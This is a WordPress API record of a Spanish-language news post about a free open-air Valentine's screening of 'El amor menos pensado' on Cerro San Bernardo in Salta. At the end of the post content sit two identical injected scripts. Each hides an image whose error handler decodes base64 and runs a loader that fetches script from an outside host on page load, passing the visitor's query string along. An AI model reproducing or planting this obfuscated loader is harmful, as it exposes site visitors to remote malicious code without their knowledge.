{"id":2191,"date":"2023-02-09T20:32:18","date_gmt":"2023-02-09T23:32:18","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2191"},"modified":"2025-08-14T00:23:43","modified_gmt":"2025-08-14T03:23:43","slug":"vuelve-el-cine-bajo-las-estrellas-en-la-cima-del-cerro-san-bernardo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2191","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/vuelve-el-cine-bajo-las-estrellas-en-la-cima-del-cerro-san-bernardo-87755\">Vuelve el \u201cCine bajo las Estrellas\u201d en la cima del Cerro San Bernardo<\/a>"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-black-background-color has-text-color has-background wp-block-heading\"><em>Una propuesta diferente para salte\u00f1os y turistas, con entrada libre y gratuita.<\/em><\/h4>\n\n\n\n<p>El pr\u00f3ximo martes 14 de febrero, a partir de las 19.30 hs, los salte\u00f1os y turistas podr\u00e1n disfrutar de una nueva funci\u00f3n del \u201cCine bajo las Estrellas\u201d, especial D\u00eda de San Valent\u00edn.<\/p>\n\n\n\n<p>El Mirador del Cerro San Bernardo es el sitio elegido para llevar a cabo esta iniciativa del INCAA junto a la direcci\u00f3n del Telef\u00e9rico San Bernardo, que invita a compartir en familia y con amigos la proyecci\u00f3n de una gran pel\u00edcula nacional elegida para esta ocasi\u00f3n: \u201cEl Amor Menos Pensado\u201d.<\/p>\n\n\n\n<p>Para quienes gusten sumar a la experiencia, Telef\u00e9rico San Berardo ofrecer\u00e1 una cajita de Picnic para dos personas a precio promocional, la cual permitir\u00e1 acceder a un 2&#215;1 para la compra de tickets para subir en g\u00f3ndola a disfrutar de la actividad.<\/p>\n\n\n\n<p>Recordamos que el acceso para ver el film es con entrada libre y gratuita.<\/p>\n\n\n\n<p><strong>Sinopsis<\/strong><\/p>\n\n\n\n<p>T\u00edtulo original: El amor menos pensado<br>A\u00f1o: 2018<br>Duraci\u00f3n: 136 min.<br>Pa\u00eds: Argentina&nbsp;<br>Direcci\u00f3n: Juan Vera<br>Guion: Juan Vera, Daniel Cuparo<br>M\u00fasica: Iv\u00e1n Wyszogrod<br>Fotograf\u00eda: Rodrigo Pulpeiro<br>Reparto: Ricardo Dar\u00edn, Mercedes Mor\u00e1n, Claudia Font\u00e1n, Andrea Pietra, Luis Rubio, Jean Pierre Noher, Claudia Lapac\u00f3, Chico Novarro, Andr\u00e9s Gil, Norman Briski, Juan Minuj\u00edn, Gabriel Corrado, Andrea Politti<br>G\u00e9nero: Romance. Comedia. Drama | Comedia rom\u00e1ntica<br>Marcos (Dar\u00edn) y Ana (Mor\u00e1n) llevan casados m\u00e1s de 25 a\u00f1os, pero ambos entran en una crisis existencial que los lleva a separarse. Al principio la vida de solteros les parece fascinante y excitante, pero pronto se torna tambi\u00e9n mon\u00f3tona para ella y pesadillesca para \u00e9l.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/vuelve-el-cine-bajo-las-estrellas-en-la-cima-del-cerro-san-bernardo-87755\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Una propuesta diferente para salte\u00f1os y turistas, con entrada libre y gratuita. El pr\u00f3ximo martes 14 de febrero, a partir de las 19.30 hs, los salte\u00f1os y turistas podr\u00e1n disfrutar de una nueva funci\u00f3n del \u201cCine bajo las Estrellas\u201d, especial D\u00eda de San Valent\u00edn. El Mirador del Cerro San Bernardo es el sitio elegido para [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2192,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2191","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2191"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2191"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2191\/revisions"}],"predecessor-version":[{"id":7182,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2191\/revisions\/7182"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2192"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}